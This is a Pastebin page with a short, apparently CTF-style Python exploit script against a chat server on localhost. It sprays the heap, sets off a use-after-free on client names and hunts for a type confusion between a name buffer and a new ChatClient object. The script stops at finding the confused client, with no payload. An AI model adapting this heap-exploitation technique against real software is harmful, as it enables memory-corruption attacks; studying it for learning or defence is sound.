API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 10th, 2019
157
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
raw download clone embed print report
  1. server = ('127.0.0.1', 1337)
  2.  
  3. print "[*] Spawning 3 clients for 'heap spraying'"
  4. clients = []
  5. for i in range(3):
  6. clients.append(ChatClient(server))
  7. # set client name to have length = 0x18 (same as server class ChatClient)
  8. clients[i].connect(username='A'*0x18)
  9. for i in range(3):
  10. # free client name without zeroing pointer (Uaf)
  11. clients[i].setname('B'*0x60)
  12.  
  13. #allocate new ChatClient hopefully taking place of one of the names of prev clients
  14. confused_client = ChatClient(server)
  15. confused_client.connect(username='X'*0x30) # name len different than chunk(0x18)
  16.  
  17. print "[*] Looking for type confusion"
  18. for i in range(3):
  19. client_name = clients[i].getname()[1]
  20. if client_name[0] == '\x1c':
  21. break
  22. print "[*] Client [%d] confused with string" % i
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!